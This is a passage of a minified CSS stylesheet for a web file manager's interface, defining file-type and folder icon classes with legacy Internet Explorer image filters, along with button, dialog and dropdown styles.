\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');}.x-vbproj{background-image:url("../../../images/file_icon/icon_file/vbproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');}.x-vbs{background-image:url("../../../images/file_icon/icon_file/vbs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');}.x-vcf{background-image:url("../../../images/file_icon/icon_file/vcf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');}.x-vcproj{background-image:url("../../../images/file_icon/icon_file/vcproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');}.x-vcxproj{background-image:url("../../../images/file_icon/icon_file/vcxproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');}.x-vdw{background-image:url("../../../images/file_icon/icon_file/vdw.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');}.x-vdx{background-image:url("../../../images/file_icon/icon_file/vdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');}.x-vsd{background-image:url("../../../images/file_icon/icon_file/vsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');}.x-vsdx{background-image:url("../../../images/file_icon/icon_file/vsdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');}.x-vss{background-image:url("../../../images/file_icon/icon_file/vss.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');}.x-vst{background-image:url("../../../images/file_icon/icon_file/vst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');}.x-vsx{background-image:url("../../../images/file_icon/icon_file/vsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');}.x-vtx{background-image:url("../../../images/file_icon/icon_file/vtx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');}.x-xaml{background-image:url("../../../images/file_icon/icon_file/xaml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');}.x-xap{background-image:url("../../../images/file_icon/icon_file/xap.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');}.x-xls{background-image:url("../../../images/file_icon/icon_file/xls.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');}.x-xlsb{background-image:url("../../../images/file_icon/icon_file/xlsb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');}.x-xlsm{background-image:url("../../../images/file_icon/icon_file/xlsm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');}.x-xlsx{background-image:url("../../../images/file_icon/icon_file/xlsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');}.x-xlt{background-image:url("../../../images/file_icon/icon_file/xlt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');}.x-xltx{background-image:url("../../../images/file_icon/icon_file/xltx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');}.x-xml{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-xps{background-image:url("../../../images/file_icon/icon_file/xps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');}.x-xsd{background-image:url("../../../images/file_icon/icon_file/xsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');}.x-xsl{background-image:url("../../../images/file_icon/icon_file/xsl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');}.x-y{background-image:url("../../../images/file_icon/icon_file/y.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');}.x-zip{background-image:url("../../../images/file_icon/icon_file/zip.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');}.x-3dm,.x-3ds,.x-asm,.x-cam360,.x-catpart,.x-catproduct,.x-cgr,.x-collaboration,.x-dae,.x-dgn,.x-dlv3,.x-dwf,.x-dwfx,.x-dwg,.x-dwt,.x-dxf,.x-exp,.x-f3d,.x-fbx,.x-g,.x-gbxml,.x-iam,.x-idw,.x-ifc,.x-ige,.x-iges,.x-igs,.x-ipt,.x-jt,.x-model,.x-neu,.x-nwc,.x-nwd,.x-obj,.x-prt,.x-rvt,.x-sab,.x-sat,.x-session,.x-skp,.x-sldasm,.x-sldprt,.x-smb,.x-smt,.x-ste,.x-step,.x-stl,.x-stla,.x-stlb,.x-stp,.x-wire,.x-x_b,.x-x_t,.x-xas,.x-xpr{background-image:url("../../../images/file_icon/icon_file/autodesk/autodesk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');}.x-3ds{background-image:url("../../../images/file_icon/icon_file/autodesk/3ds.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');}.x-3dm{background-image:url("../../../images/file_icon/icon_file/autodesk/3dm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');}.x-dae{background-image:url("../../../images/file_icon/icon_file/autodesk/dae.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');}.x-stl,.x-stla,.x-stlb{background-image:url("../../../images/file_icon/icon_file/autodesk/stl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');}.x-dwg{background-image:url("../../../images/file_icon/icon_file/autodesk/dwg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');}.x-dwf{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dwfx{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dxf{background-image:url("../../../images/file_icon/icon_file/autodesk/dxf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');}.x-ifc{background-image:url("../../../images/file_icon/icon_file/autodesk/ifc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');}.x-iam{background-image:url("../../../images/file_icon/icon_file/autodesk/iam.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');}.x-fbx{background-image:url("../../../images/file_icon/icon_file/autodesk/fbx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');}.x-rvt{background-image:url("../../../images/file_icon/icon_file/autodesk/rvt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');}.x-skp{background-image:url("../../../images/file_icon/icon_file/autodesk/skp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');}.x-vnd,.x-dgn{background-image:url("../../../images/file_icon/icon_file/autodesk/vnd-dgn.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');}.x-folder{background-image:url("../../../images/file_icon/icon_others/folder.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');}.x-folder-share{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-recycle{background-image:url("../../../images/file_icon/icon_others/recycle.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');}.x-recycle-full{background-image:url("../../../images/file_icon/icon_others/recycle_full.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');}.x-path-self-share{background-image:url("../../../images/file_icon/icon_others/path_self_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');}.x-app-link{background-image:url("../../../images/file_icon/icon_others/app_link.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');}.x-user{background-image:url("../../../images/file_icon/icon_others/user.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');}.x-user-self{background-image:url("../../../images/file_icon/icon_others/userSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');}.x-share{background-image:url("../../../images/file_icon/icon_others/share.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');}.x-group-self{background-image:url("../../../images/file_icon/icon_others/groupSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');}.x-group-self-owner{background-image:url("../../../images/file_icon/icon_others/groupSelfOwner.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px 